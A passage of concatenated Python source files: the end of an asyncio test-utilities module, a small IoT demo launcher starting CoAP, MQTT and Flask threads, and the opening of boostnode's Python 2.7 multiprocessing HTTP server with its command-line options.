self._thread_cleanup = support.threading_setup()
def tearDown(self):
self.unpatch_get_running_loop()
events.set_event_loop(None)
# Detect CPython bug #23353: ensure that yield/yield-from is not used
# in an except block of a generator
self.assertEqual(sys.exc_info(), (None, None, None))
self.doCleanups()
support.threading_cleanup(*self._thread_cleanup)
support.reap_children()
if not compat.PY34:
# Python 3.3 compatibility
def subTest(self, *args, **kwargs):
class EmptyCM:
def __enter__(self):
pass
def __exit__(self, *exc):
pass
return EmptyCM()
@contextlib.contextmanager
def disable_logger():
"""Context manager to disable asyncio logger.
For example, it can be used to ignore warnings in debug mode.
"""
old_level = logger.level
try:
logger.setLevel(logging.CRITICAL+1)
yield
finally:
logger.setLevel(old_level)
def mock_nonblocking_socket(proto=socket.IPPROTO_TCP, type=socket.SOCK_STREAM,
family=socket.AF_INET):
"""Create a mock of a non-blocking socket."""
sock = mock.MagicMock(socket.socket)
sock.proto = proto
sock.type = type
sock.family = family
sock.gettimeout.return_value = 0.0
return sock
def force_legacy_ssl_support():
return mock.patch('asyncio.sslproto._is_sslproto_available',
return_value=False)
|
app.py
|
import asyncio
from threading import Thread
import sys, os, time
from sensor_program import coap_server
from gateway_program.client import gateway_client
from gateway_program.broker import mqtt_broker
from user_interface_program.client import mqtt_client
from user_interface_program.front_end import flask_server
def main():
# Servers
Thread(target=coap_server.run_server).start()
Thread(target=mqtt_broker.run_server).start()
Thread(target=flask_server.run_server).start()
# Start clients
Thread(target=gateway_client.run_client).start()
Thread(target=mqtt_client.run_client).start()
# Wait for keyboard interrupt to kill all threads
while True:
try:
time.sleep(1)
except KeyboardInterrupt:
os._exit(0)
if __name__ == "__main__":
main()
|
server.py
|
#!/usr/bin/env python2.7
# -*- coding: utf-8 -*-
# region header
'''Provides server and request handler classes.'''
# # python3.5
# # pass
from __future__ import absolute_import, division, print_function, \
unicode_literals
# #
'''
For conventions see "boostnode/__init__.py" on \
https://github.com/thaibault/boostnode
'''
__author__ = 'Torben Sickert'
__copyright__ = 'see boostnode/__init__.py'
__credits__ = 'Torben Sickert',
__license__ = 'see boostnode/__init__.py'
__maintainer__ = 'Torben Sickert'
__maintainer_email__ = 'info["~at~"]torben.website'
__status__ = 'stable'
__version__ = '1.0'
from base64 import b64encode as base64_encode
from base64 import b64decode as base64_decode
# # python3.5
# # import builtins
import __builtin__ as builtins
import BaseHTTPServer as server
import CGIHTTPServer as cgi_http_server
# #
import cgi
# # python3.5
# # from collections import Iterable as NativeIterable
# # from copy import copy, deepcopy
# # from http import server
# # import imp
import Cookie as cookies
from copy import copy, deepcopy
# #
import gzip
# # python3.5 from http import cookies
pass
import inspect
# # python3.5
# # import _io
# # import io
pass
# #
import json
import logging
import multiprocessing
import os
import posixpath
# # python3.5 import socketserver
pass
import ssl
import re as regularExpression
import signal
import socket
import subprocess
import sys
# # python3.5
# # pass
import SocketServer
import StringIO
# #
import threading
import time
# # python3.5
# # from types import FunctionType as Function
# # from types import ModuleType
# # from urllib.parse import urlparse as parse_url
# # from urllib.parse import parse_qs as parse_url_query
# # from urllib.parse import unquote as unquote_url
import urllib
from urlparse import urlparse as parse_url
from urlparse import parse_qs as parse_url_query
from urlparse import unquote as unquote_url
# #
'''Make boostnode packages and modules importable via relative paths.'''
sys.path.append(os.path.abspath(sys.path[0] + 2 * (os.sep + '..')))
# # python3.5
# # from boostnode import ENCODING
from boostnode import ENCODING, convert_to_string, convert_to_unicode
# #
from boostnode.extension.file import Handler as FileHandler
from boostnode.extension.native import Iterable, Dictionary, Module, Object, \
InstancePropertyInitializer, String
from boostnode.extension.output import Buffer, Print
from boostnode.extension.output import SET_ATTRIBUTE_MODE as \
SET_OUTPUT_ATTRIBUTE_MODE
from boostnode.extension.output import RESET_ATTRIBUTE_MODE as \
RESET_OUTPUT_ATTRIBUTE_MODE
from boostnode.extension.output import COLOR as OUTPUT_COLOR
from boostnode.extension.system import CommandLine, Platform, Runnable
# # python3.5 from boostnode.extension.type import Self
pass
from boostnode.paradigm.aspectOrientation import JointPoint
from boostnode.paradigm.objectOrientation import Class
# endregion
# TODO check branches.
# region classes
# # python3.5
# # pass
class SocketFileObjectWrapper(socket._fileobject):
'''
This class wraps the native implementation of the server socket. \
The main goal is that the first line from given socket have to be \
taken twice. This curious feature is the only way to get the \
requested file as early as needed to decide if we are able to \
spawn a new process for better load balancing.
'''
# region dynamic methods
# # region public
# # # region special
@JointPoint
def __init__(self, *arguments, **keywords):
'''
This methods wraps the initializer to make the first read \
line variable instance bounded.
'''
# # # region properties
'''Indicates and saves the first line read of the socket.'''
self.first_read_line = False
# # # endregion
'''Take this method via introspection.'''
return builtins.getattr(
builtins.super(self.__class__, self), inspect.stack()[0][3]
)(*arguments, **keywords)
# # endregion
@JointPoint
def readline(self, *arguments, **keywords):
'''Wraps the "readline()" method to get the first line twice.'''
if self.first_read_line is False:
try:
'''Take this method via introspection.'''
self.first_read_line = builtins.getattr(
builtins.super(self.__class__, self),
inspect.stack()[0][3]
)(*arguments, **keywords)
return self.first_read_line
except(
socket.herror, socket.gaierror, socket.timeout,
socket.error
) as exception:
__logger__.info(
'Connection interrupted. %s: %s',
exception.__class__.__name__, convert_to_unicode(
exception))
return ''
elif self.first_read_line is True:
try:
'''Take this method via introspection.'''
return builtins.getattr(
builtins.super(self.__class__, self),
inspect.stack()[0][3]
)(*arguments, **keywords)
except(
socket.herror, socket.gaierror, socket.timeout,
socket.error
) as exception:
__logger__.info(
'Connection interrupted. %s: %s',
exception.__class__.__name__, convert_to_unicode(
exception))
return ''
result = self.first_read_line
self.first_read_line = True
return result
# endregion
# endregion
# #
# # python3.5
# # class MultiProcessingHTTPServer(
# # socketserver.ThreadingMixIn, server.HTTPServer
# # ):
class MultiProcessingHTTPServer(
SocketServer.ThreadingMixIn, server.HTTPServer, builtins.object
):
# #
'''The Class implements a partial multiprocessing supported web server.'''
# region dynamic methods
# # region public
# # # region special
@JointPoint
# # python3.5
# # def __init__(
# # self: Self, *arguments: builtins.object,
# # **keywords: builtins.object
# # ) -> None:
def __init__(self, *arguments, **keywords):
# #
'''
This initializer wrapper makes sure that the special wrapped file \
socket is instance bounded.
'''
# # # region properties
'''
This attribute saves the modified read file socket to apply it in \
the request handler.
'''
self.read_file_socket = None
# # # endregion
'''Take this method via introspection.'''
if not __test_mode__:
return builtins.getattr(
builtins.super(self.__class__, self), inspect.stack()[0][3]
)(*arguments, **keywords)
# # endregion
# endregion
@JointPoint
# # python3.5
# # def is_same_process_request(
# # self: Self, request: socket.socket
# # ) -> builtins.bool:
def is_same_process_request(self, request):
# #
'''
Determines if the given request could be run in its own dedicated \
process.
'''
first_request_line = self.read_file_socket.readline(
Web.MAXIMUM_FIRST_GET_REQUEST_LINE_IN_CHARS
).strip()
# # python3.5
# # if Iterable(self.web.same_process_request_whitelist).is_in_pattern(
# # value=first_request_line.decode()
# # ):
if Iterable(self.web.same_process_request_whitelist).is_in_pattern(
value=first_request_line
):
# #
return True
if self.web.same_process_request_blacklist:
# # python3.5
# # return not Iterable(
# # self.web.same_process_request_blacklist
# # ).is_in_pattern(value=first_request_line.decode())
return not Iterable(
self.web.same_process_request_blacklist
).is_in_pattern(value=first_request_line)
# #
return False
@JointPoint
# # python3.5
# # def process_request_no_termination_wrapper(
# # self: Self, parent_function: Function,
# # request: socket.socket, arguments: builtins.tuple,
# # keywords: builtins.dict
# # ) -> None:
def process_request_no_termination_wrapper(
self, parent_function, request, arguments, keywords
):
# #
'''
Wraps the normal "process_request" method. To manage the process \
forking stuff.
'''
try:
signal_numbers = Platform.termination_signal_numbers
for signal_number in signal_numbers:
signal.signal(signal_number, signal.SIG_IGN)
parent_function(self, request, *arguments, **keywords)
# # python3.5
# # except(
# # builtins.BrokenPipeError, socket.gaierror,
# # socket.herror, socket.timeout, socket.error
# # ) as exception:
# # __logger__.info(
# # 'Connection interrupted. %s: %s',
# # exception.__class__.__name__, builtins.str(exception))
except(
socket.herror, socket.gaierror, socket.timeout, socket.error
) as exception:
__logger__.info(
'Connection interrupted. %s: %s',
exception.__class__.__name__, convert_to_unicode(
exception))
# #
@JointPoint
# # python3.5
# # def process_request(
# # self: Self, request_socket: socket.socket,
# # *arguments: builtins.object, **keywords: builtins.object
# # ) -> None:
def process_request(self, request_socket, *arguments, **keywords):
# #
'''
This method indicates whether the request is a read only or not. \
Read only requests will be forked if enough free processors are \
available.
'''
if self.web.block_new_worker:
return None
# # python3.5
# # self.read_file_socket = request_socket.makefile('rb', -1)
# # read_file_socket = self.read_file_socket
# #
# # @JointPoint
# # def readline(
# # *arguments: builtins.object, **keywords: builtins.object
# # ) -> builtins.bytes:
# # '''Wraps the native file object method version.'''
# # self = read_file_socket
# # if not builtins.hasattr(self, 'first_read_line'):
# # self.first_read_line = builtins.getattr(
# # io.BufferedReader, inspect.stack()[0][3]
# # )(self, *arguments, **keywords)
# # return self.first_read_line
# # elif self.first_read_line is True:
# # '''Take this method via introspection.'''
# # return builtins.getattr(
# # io.BufferedReader, inspect.stack()[0][3]
# # )(self, *arguments, **keywords)
# # result = self.first_read_line
# # self.first_read_line = True
# # return result
# # self.read_file_socket.readline = readline
'''
This assignment replace the python's native \
"socket.socket.makefile('rb', -1)" behavior.
'''
self.read_file_socket = SocketFileObjectWrapper(
request_socket, 'rb', -1)
# #
'''NOTE: We have to add 1 for the server processes itself.'''
self.web.number_of_running_processes = \
builtins.len(multiprocessing.active_children()) + 1
'''Determine this method name via introspection.'''
parent_function = builtins.getattr(
server.HTTPServer, inspect.stack()[0][3])
'''
NOTE: "self.is_same_process_request()" has to be called, because \
we expect to read the request head twice from the buffer.
'''
if(not self.is_same_process_request(request_socket) and
self.web.number_of_running_processes <
self.web.maximum_number_of_processes):
self.web.number_of_running_processes += 1
'''Takes this method via introspection from now on.'''
# # python3.5
# # multiprocessing.Process(
# # target=self.process_request_no_termination_wrapper,
# # daemon=True,
# # args=(parent_function, request_socket, arguments, keywords)
# # ).start()
forked_request_process = multiprocessing.Process(
target=self.process_request_no_termination_wrapper,
args=(
parent_function, request_socket, arguments, keywords))
forked_request_process.daemon = True
forked_request_process.start()
# #
else:
try:
# # python3.5
# # return parent_function(
# # self, request_socket, *arguments, **keywords)
# # except(
# # builtins.BrokenPipeError, socket.gaierror, socket.herror,
# # socket.timeout, socket.error
# # ) as exception:
# # __logger__.info(
# # 'Connection interrupted. %s: %s',
# # exception.__class__.__name__, builtins.str(exception))
return parent_function(
self, request_socket, *arguments, **keywords)
except(
socket.herror, socket.gaierror, socket.timeout,
socket.error
) as exception:
__logger__.info(
'Connection interrupted. %s: %s',
exception.__class__.__name__, convert_to_unicode(
exception))
# #
# endregion
class Web(Class, Runnable):
'''
Provides a small platform independent web server designed for easily \
serve a client-server structure.
**root** - Defines the root directory \
to be served via web.
**host_name** - Defines the current host \
name. Necessary for https \
support.
**port** - The port to listen for \
incoming requests. If "0" \
given a free port will be \
determined automatically.
**default** - Defines a default static \
file, python module or \
dynamic executable file.
**key_file** - Key file to support a https \
connection.
**stop_order** - Standard in command to stop \
server.
**encoding** - Encoding to use for \
incoming requests and \
outgoing data.
**request_whitelist** - A whitelist for requests. \
All requests which doesn't \
match to one of these will \
be answered with an 404 \
error code.
**request_blacklist** - A blacklist for requests to \
answer with a 404 error code.
**same_process_request_whitelist** - Requests which matches one \
one of theses patterns \
should be run in same \
process as the server \
itself. This is usually \
necessary if you plan to \
write in inter thread \
shared data.
**same_process_request_blacklist** - Requests which matches one \
one of theses patterns \
could be run in different \
processes as the server \
itself. This is usually \
possible if you not plan to \
write in inter thread \
shared data.
**static_mime_type_pattern** - Defines which mime types \
should be interpreted as \
static.
**dynamic_mime_type_pattern** - Defines which mime types \
should be interpreted as \
dynamic.
**compressible_mime_type_pattern** - Defines which mime types \
could be returned in a \
compressed way.
**default_file_name_pattern** - Defines file name pattern \
which should be returned \
if no explicit file was \
requested.
**default_module_names** - Defines which module names \
should be ran if no \
explicit module was \
requested.
**authentication** - Enables basic http \
authentication.
**authentication_file_name** - Defines file names for \
saving login data.
**authentication_file_content_pattern** - Defines how to parse \
authentication files.
**authentication_handler** - A boolean function which \
decides by given request \
string and password if \
requested user is \
authenticated.
**module_loading** - Enables or disables running \
python modules which are \
requested.
**maximum_number_of_processes** - Maximum number of used \
processor cores to use. if \
"0" is provided a useful \
number will be determined.
**shared_data** - Data which will be \
available in every request \
handler instance and \
accessible for every common \
gateway interface script.
**request_parameter_delimiter** - Delimiter to distinguish \
requested file from given \
parameter.
**file_size_stream_threshold_in_byte** - Threshold which will force \
the server to stream data.
**directory_listing** - Indicates whether the \
server generates a \
directory listing for \
requested directories.
**internal_redirects** - A mapping of request url \
patterns to corresponding \
internal version. Regular \
expression replacements are \
supported.
**external_redirects** - A mapping of request url \
patterns to corresponding \
external version. Regular \
expression replacements are \
supported.
Examples:
>>> key_file = FileHandler(
... __test_folder__.path + '_initialize_key_file')
>>> key_file.content = ''
>>> Web(key_file=key_file) # doctest: +ELLIPSIS
Object of "Web" with root path "...", port "0" and stop order ...
>>> Web(
... key_file=__test_folder__.path
... ) # doctest: +IGNORE_EXCEPTION_DETAIL
Traceback (most recent call last):
...
ServerError: Given public key file path "..." ...
'''
# region properties
COMMAND_LINE_ARGUMENTS = (
{'arguments': ('-r', '--root'),
'specification': {
'action': 'store',
'default': {'execute': '__initializer_default_value__'},
'type': {'execute': 'type(__initializer_default_value__)'},
'required': {'execute': '__initializer_default_value__ is None'},
'help': 'Defines which path is used as web root (default is '
'current working directory).',
'dest': 'root',
'metavar': 'PATH'}},
{'arguments': ('-H', '--host-name'),
'specification': {
'action': 'store',
'default': {'execute': '__initializer_default_value__'},
'type': {'execute': 'type(__initializer_default_value__)'},
'required': {'execute': '__initializer_default_value__ is None'},
'help': 'Defines the host to bind the server to. If an empty '
'string (default) is given, the underlying socket will '
'listen on all network interfaces. E.g. a binding to the'
' internal loop device "localhost" will only accept local'
' requests. This makes sense if a local proxy server is '
'configured.',
'dest': 'host_name',
'metavar': 'NAME'}},
{'arguments': ('-p', '--port'),
'specification': {
'action': 'store',
'default': {'execute': '__initializer_default_value__'},
'type': {'execute': 'type(__initializer_default_value__)'},
'choices': builtins.range(2 ** 16),
'required': {'execute': '__initializer_default_value__ is None'},
'help': 'Defines the port number to access the web server. If '
'zero given a free port will be determined.',
'dest': 'port',
'metavar': 'NUMBER'}},
{'arguments': ('-d', '--default'),
'specification': {
'action': 'store',
'default': {'execute': '__initializer_default_value__'},
'type': {'execute': 'type(__initializer_default_value__)'},
'required': {'execute': '__initializer_default_value__ is None'},
'help': {
'execute': "'Defines which file or module should be requested"
' if nothing was declared explicitly. It could be '
"""understood as welcome page (default: "%s").'"""
" % __initializer_default_value__.replace('%', "
"'%%')"},
'dest': 'default',
'metavar': 'PATH'}},
{'arguments': ('-u', '--key-file-path'),
'specification': {
'action': 'store',
'default': {'execute': '__initializer_default_value__'},
'type': {'execute': 'type(__initializer_default_value__)'},
'required': {'execute': '__initializer_default_value__ is None'},
'help': {
'execute': "'Defines a key file (*.pem) to enable open ssl "
'''encryption (default: "%s").' % '''
"__initializer_default_value__.replace('%', "
"'%%')"},
'dest': 'key_file',
'metavar': 'PATH'}},
{'arguments': ('-o', '--stop-order'),
'specification': {
'action': 'store',
'default': {'execute': '__initializer_default_value__'},
'type': {'execute': 'type(__initializer_default_value__)'},
'required': {'execute': '__initializer_default_value__ is None'},
'help': {
'execute': '"""Saves a cli-command for shutting down the '
'server (default: "%s").""" % '
'__initializer_default_value__'},
'dest': 'stop_order',
'metavar': 'STRING'}},
{'arguments': ('-w', '--request-whitelist'),
'specification': {
'action': 'store',
'nargs': '*',
'default': {'execute': '__initializer_default_value__'},
'type': builtins.str,
'required': {'execute': '__initializer_default_value__ is None'},
'help': 'Select request type regular expression patterns which '
'are only allowed for being interpreted.',
'dest': 'request_whitelist',
'metavar': 'REGEX_PATTERN'}},
{'arguments': ('-b', '--request-blacklist'),
'specification': {
'action': 'store',
'nargs': '*',
'default': {'execute': '__initializer_default_value__'},
'type': builtins.str,
'required': {'execute': '__initializer_default_value__ is None'},
'help': 'Select request type regular expression patterns which '
"aren't allowed for being interpreted.",
'dest': 'request_blacklist',
'metavar': 'REGEX_PATTERN'}},
{'arguments': ('-K', '--known-big-web-mime-types'),
'specification': {
'action': 'store',
'nargs': '*',
'default': {'execute': '__initializer_default_value__'},
'type': builtins.str,
'required': {'execute': '__initializer_default_value__ is None'},
'help': 'A whitelist of file mime types which should be '
'associated with a typical browser extension. This files '
'will be send with their respective mime type no matter '
'how big they are.',
'dest': 'known_big_web_mime_types',
'metavar': 'MIME_TYPES'}},
{'arguments': ('-I', '--internal-redirects'),
'specification': {
'action': 'store',
'nargs': '*',
'default': {'execute': '__initializer_default_value__'},
'type': builtins.str,
'required': {'execute': '__initializer_default_value__ is None'},
'help': 'Select a mapping (with "#" as delimiter) to redirect '
'url suffixes internal.',
'dest': 'internal_redirects',
'metavar': 'REGEX_PATTERN#REPLACEMENT'}},
{'arguments': ('-A', '--external-redirects'),
'specification': {
'action': 'store',
'nargs': '*',
'default': {'execute': '__initializer_default_value__'},
'type': builtins.str,
'required': {'execute': '__initializer_default_value__ is None'},
'help': 'Select a mapping (with "#" as delimiter) to redirect '
'url suffixes external.',
'dest': 'external_redirects',
'metavar': 'REGEX_PATTERN#REPLACEMENT'}},
{'arguments': ('-s', '--static-mime-type-pattern'),
'specification': {
'action': 'store',
'nargs': '*',
'default': {'execute': '__initializer_default_value__'},
'type': builtins.str,
'required': {'execute': '__initializer_default_value__ is None'},
'help': {
'execute': "'All mime-type patterns which should recognize a "
'static file. Those files will be directly sent to'
''' client without any preprocessing (default: '''
'"%s").\' % \'", "\'.join('
"__initializer_default_value__).replace('%', "
"'%%')"},
'dest': 'static_mime_type_pattern',
'metavar': 'REGEX_PATTERN'}},
{'arguments': ('-y', '--dynamic-mime-type-pattern'),
'specification': {
'action': 'store',
'nargs': '*',
'default': {'execute': '__initializer_default_value__'},
'type': builtins.str,
'required': {'execute': '__initializer_default_value__ is None'},
'help': {
'execute': "'All mime-type patterns which should recognize a "
'dynamic file. Those files will be interpreted so '
'the result can be send back to client (default: '
'''"%s").' % '", "'.join('''
"__initializer_default_value__).replace('%', "
"'%%')"},
'dest': 'dynamic_mime_type_pattern',
'metavar': 'REGEX_PATTERN'}},
{'arguments': ('-C', '--compressible-mime-type-pattern'),
'specification': {
'action': 'store',
'nargs': '*',
'default': {'execute': '__initializer_default_value__'},
'type': builtins.str,
'required': {'execute': '__initializer_default_value__ is None'},
'help': {
'execute': "'All mime-type patterns which should compressed "
'before sending through network socket (default: "'
'''%s").' % '", "'.join('''
"__initializer_default_value__).replace('%', "
"'%%')"},
'dest': 'compressible_mime_type_pattern',
'metavar': 'REGEX_PATTERN'}},
{'arguments': ('-f', '--default-file-name-pattern'),
'specification': {
'action': 'store',
'nargs': '*',
'default': {'execute': '__initializer_default_value__'},
'type': builtins.str,
'required': {'execute': '__initializer_default_value__ is None'},
'help': {
'execute': "'All file name patterns which should be run if "
'there is one present and no other default file '
'pattern/name is given on initialisation (default:'
''' "%s").' % '", "'.join('''
"__initializer_default_value__).replace('%', "
"'%%')"},
'dest': 'default_file_name_pattern',
'metavar': 'REGEX_PATTERN'}},
{'arguments': ('-n', '--default-module-name-pattern'),
'specification': {
'action': 'store',
'nargs': '*',
'default': {'execute': '__initializer_default_value__'},
'type': builtins.str,
'required': {'execute': '__initializer_default_value__ is None'},
'help': {
'execute': "'Same as file name for module name patterns. "
'Note that default files have a lower priority as '
'''default python modules (default: "%s").' % '''
"""'", "'.join(__initializer_default_value__)"""
".replace('%', '%%')"},
'dest': 'default_module_names',
'metavar': 'REGEX_PATTERN'}},
{'arguments': ('-q', '--file-size-stream-threshold-in-byte'),
'specification': {
'action': 'store',
'default': {'execute': '__initializer_default_value__'},
'type': {'execute': 'type(__initializer_default_value__)'},
'required': {'execute': '__initializer_default_value__ is None'},
'help': {
'execute': "'Defines the minimum number of bytes which "
'triggers the server to send an octet-stream '
'''header to client (default: "%d").' % '''
'__initializer_default_value__'},
'dest': 'file_size_stream_threshold_in_byte',
'metavar': 'NUMBER'}},
{'arguments': ('-a', '--authentication'),
'specification': {
'action': 'store_true',
'default': {'execute': '__initializer_default_value__'},
'required': {'execute': '__initializer_default_value__ is None'},
'help': 'Enables basic http authentication. You can control '
'this behavior by providing an authentication file in '
'directories you want to save.',
'dest': 'authentication'}},
{'arguments': ('-e', '--enable-module-loading'),
'specification': {
'action': 'store_true',
'default': False,
'required': False,
'help': 'Enables module loading via get query. Enabling this '
'feature can slow down your request performance '
'extremely. Note that self module loading via "__main__" '
'is possible independently.',
'dest': 'module_loading'}},
{'arguments': ('-z', '--disable-directory-listing'),
'specification': {
'action': 'store_false',
'default': True,
'required': False,
'help': 'Disables automatic directory listing if a directory is '
'requested.',
'dest': 'directory_listing'}},
{'arguments': ('-g', '--authentication-file-content-pattern'),
'specification': {
'action': 'store',
'default': {'execute': '__initializer_default_value__'},
'type': {'execute': 'type(__initializer_default_value__)'},
'required': {'execute': '__initializer_default_value__ is None'},
'help': {
'execute': "'Defines the regular expression pattern to define"
' how to parse authentication files (default: '
'''"%s").' % __initializer_default_value__.'''
"replace('%', '%%')"},
'dest': 'authentication_file_content_pattern',
'metavar': 'REGEX_PATTERN'}},
{'arguments': ('-i', '--authentication-file-name-pattern'),
'specification': {
'action': 'store',
'default': {'execute': '__initializer_default_value__'},
'type': {'execute': 'type(__initializer_default_value__)'},
'required': {'execute': '__initializer_default_value__ is None'},
'help': {
'execute': "'Defines the authentication file name (default: "
'''"%s").' % __initializer_default_value__.'''
"replace('%', '%%')"},
'dest': 'authentication_file_name',
'metavar': 'STRING'}},
{'arguments': ('-j', '--request-parameter-delimiter'),
'specification': {
'action': 'store',
'default': {'execute': '__initializer_default_value__'},
'type': {'execute': 'type(__initializer_default_value__)'},
'required': {'execute': '__initializer_default_value__ is None'},
'help': {
'execute': "'Defines the request delimiter parameter "
'''(default: "%s").' % '''
"__initializer_default_value__.replace('%', "
"'%%')"},
'dest': 'request_parameter_delimiter',
'metavar': 'STRING'}},
{'arguments': ('-E', '--encoding'),
'specification': {
'action': 'store',
'default': {'execute': '__initializer_default_value__'},
'type': {'execute': 'type(__initializer_default_value__)'},
'required': {'execute': '__initializer_default_value__ is None'},
'help': {
'execute': "'Sets encoding for interpreting binary data like "
'post or authentication requests, decoding given '
"url\\'s or encoding compressed gzip data for "
'''clients (default: "%s").' % '''
"__initializer_default_value__.replace('%', "
"'%%')"},
'dest': 'encoding',
'metavar': 'STRING'}},
{'arguments': ('-k', '--maximum-number-of-processes'),
'specification': {
'action': 'store',
'default': {'execute': '__initializer_default_value__'},
'type': {'execute': 'type(__initializer_default_value__)'},
'required': {'execute': '__initializer_default_value__ is None'},
'help': {
'execute': "'Defines the maximum number of concurrent running"
' processes. If set to zero a useful value '
'depending on detected processor will be '
'''determined (default: "%d").' % '''
'__initializer_default_value__'},
'dest': 'maximum_number_of_processes',
'metavar': 'NUMBER'}})
'''Holds all command line interface argument informations.'''
HIGHEST_AVAILABLE_PORT = 2 ** 16 - 1
'''Saves the highest available port to launch server.'''
DETERMINE_IP_SOCKET = '8.8.8.8', 80
'''
Globally accessible socket to ask for currently useful ip determining.
'''
DEFAULT_NUMBER_OF_PROCESSES = 8
'''
This is the maximum number of forked processes if nothing better was \
defined or determined.
'''
MAXIMUM_FIRST_GET_REQUEST_LINE_IN_CHARS = 65537
'''This values describes the longest possible first get request line.'''
STATUS_PREFIX_CODE_LOGGING_COLOR_MAPPING = {
2: OUTPUT_COLOR['foreground']['green'],
3: OUTPUT_COLOR['foreground']['blue'],
4: OUTPUT_COLOR['foreground']['yellow'],
5: OUTPUT_COLOR['foreground']['red']
}
'''Maps a highlighting color to each http status code prefix.'''
instances = []
'''Saves all initializes server instances.'''
# endregion
# region dynamic methods
# # region public
# # # region special
@JointPoint
# # python3.5
# # def __repr__(self: Self) -> builtins.str:
def __repr__(self):
# #
'''
Invokes if this object should describe itself by a string.
Examples:
>>> repr(Web()) # doctest: +ELLIPSIS
'Object of "Web" with root path "...", port "0" and sto..."sto...'
'''
return (
'Object of "{class_name}" with root path "{path}", port "{port}" '
'and stop order "{stop_order}". Number of running '
'threads/processes: {number_of_running_threads}/'
'{number_of_running_processes}.'.format(
class_name=self.__class__.__name__, path=self.root,
port=self.port, stop_order=self.stop_order,
number_of_running_threads=self.number_of_running_threads,
number_of_running_processes=self.number_of_running_processes))
# # # endregion
@JointPoint
# # python3.5
# # def stop(
# # self: Self, *arguments: builtins.object, force_stopping=False,
# # **keywords: builtins.object
# # ) -> Self:
def stop(self, *arguments, **keywords):
# #
'''
Waits for running workers and shuts the server down.
Arguments and keywords are forwarded to \
"boostnode.extension.system.Run.stop()".
Examples:
>>> web = Web()
>>> web.stop() # doctest: +ELLIPSIS
Object of "Web" with root path "...", port "0" and stop order "...
>>> web.service = True
>>> web.stop() # doctest: +ELLIPSIS
Object of "Web" with root path "...", port "0" and stop order "s...
'''
# # python3.5
# # pass
force_stopping, keywords = Dictionary(keywords).pop_from_keywords(
name='force_stopping', default_value=False)
# #
if self.__dict__.get('service'):
self.block_new_worker = True
# TODO check new branches.
number_of_running_workers = self.number_of_running_threads + \
builtins.len(multiprocessing.active_children())
if force_stopping:
if number_of_running_workers:
__logger__.info(
'Enforcing web server child processes to stop.')
for worker in multiprocessing.active_children():
os.kill(worker.pid, signal.SIGKILL)
return self
else:
self._stop_graceful(number_of_running_workers)
if not __test_mode__:
'''Terminates the serve forever loop.'''
self.service.shutdown()
try:
'''
Tells client site to stop writing data into the socket.
'''
self.service.socket.shutdown(socket.SHUT_RDWR)
except socket.error as exception:
# # python3.5
# # __logging__.warning(
# # 'Connection couldn\'t be released on both sites. '
# # '%s: %s', exception.__class__.__name__,
# # builtins.str(exception))
__logging__.warning(
'Connection couldn\'t be released on both sites. '
'%s: %s', exception.__class__.__name__,
convert_to_unicode(exception))
# #
'''Tells the kernel to free binded port.'''
self.service.socket.setsockopt(
socket.SOL_SOCKET, socket.SO_REUSEADDR, 1)
self.service.socket.close()
'''Take this method type from abstract class via introspection.'''
return builtins.getattr(
builtins.super(self.__class__, self), inspect.stack()[0][3]
)(*arguments, force_stopping=force_stopping, **keywords)
# # endregion
# # region protected
# # # region runnable implementation
@JointPoint
# # python3.5 def _run(self: Self) -> Self:
def _run(self):
'''
Entry point for command line call of this program. Starts the \
server's request handler listing for incoming requests.
Examples:
>>> sys_argv_backup = copy(sys.argv)
>>> sys.argv[1:] = ['--port', '8080']
>>> Web()._run() # doctest: +ELLIPSIS
Object of "Web" with root path "...", port "8080" and stop order...
>>> sys.argv[3:] = [
... '--internal-redirects', 'a#b', 'c#dd',
... '--external-redirects', 'ee#f']
>>> Web()._run() # doctest: +ELLIPSIS
Object of "Web" with root path "...", port "8080" and stop order...
>>> Web.run() # doctest: +ELLIPSIS
Object of "Web" with root path "...", port "8080" and stop order...
>>> sys.argv = sys_argv_backup
'''
command_line_arguments = CommandLine.argument_parser(
arguments=self.COMMAND_LINE_ARGUMENTS,
module_name=__name__, scope={'self': self})
command_line_arguments.internal_redirects = builtins.tuple(
builtins.map(
lambda redirect: redirect.split('#'),
command_line_arguments.internal_redirects))
command_line_arguments.external_redirects = builtins.tuple(
builtins.map(
lambda redirect: redirect.split('#'),
command_line_arguments.external_redirects))
return self._initialize(**self._command_line_arguments_to_dictionary(
namespace=command_line_arguments))
@JointPoint(InstancePropertyInitializer)
# # python3.5
# # def _initialize(
# # self: Self, root=None, host_name='', port=0, default='',
# # key_file=None, stop_order='stop', encoding=ENCODING,
# # request_whitelist=('*:/.*',), request_blacklist=(),
# # same_process_request_whitelist=(),
# # same_process_request_blacklist=(),
# # # NOTE: Tuple for explicit web server file reference validation.
# # # ('text/.+$', 'image/.+$', 'application/(x-)?javascript$')
# # static_mime_type_pattern=('.+/.+$',),
# # dynamic_mime_type_pattern=(
# # 'text/x-(python|sh|bash|shellscript)$',),
# # compressible_mime_type_pattern=(
# # 'text/.+$', 'application/javascript$'),
# # default_file_name_pattern=(
# # 'index(?!\.(tpl|js)$)(?:\.[a-zA-Z0-9]{0,4})?$',
# # '(?:index|__main__|main|initialize)(?!\.tpl$)'
# # '(?:\.[a-zA-Z0-9]{0,4})?$'
# # default_module_names=('index', '__main__', 'main', 'initialize'),
# # authentication=True, authentication_file_name='.htpasswd',
# # authentication_file_content_pattern=
# # '(?P<name>.+):(?P<password>.+)',
# # authentication_handler=None, module_loading=None,
# # maximum_number_of_processes=0, shared_data=None,
# # request_parameter_delimiter='\?',
# # file_size_stream_threshold_in_byte=8388608, # 8 MB
# # directory_listing=True, internal_redirects=None,
# # external_redirects=None,
# # known_big_web_mime_types=('application/x-shockwave-flash',),
# # **keywords: builtins.object
# # ) -> Self:
def _initialize(
self, root=None, host_name='', port=0, default='',
key_file=None, stop_order='stop', encoding=ENCODING,
request_whitelist=('*:/.*',), request_blacklist=(),
same_process_request_whitelist=(),
same_process_request_blacklist=(),
# NOTE: Tuple for explicit web server file reference validation.
# ('text/.+$', 'image/.+$', 'application/(x-)?javascript$')
static_mime_type_pattern=('.+/.+$',),
dynamic_mime_type_pattern=(
'text/x-(python|sh|bash|shellscript)$',),
compressible_mime_type_pattern=(
'text/.+$', '^application/javascript$'),
default_file_name_pattern=(
'index(?!\.(tpl|js)$)(?:\.[a-zA-Z0-9]{0,4})?$',
'(?:index|__main__|main|initialize)(?!\.tpl$)'
'(?:\.[a-zA-Z0-9]{0,4})?$'
), default_module_names=('index', '__main__', 'main', 'initialize'),
authentication=True, authentication_file_name='.htpasswd',
authentication_file_content_pattern=
'(?P<name>.+):(?P<password>.+)',
authentication_handler=None, module_loading=None,
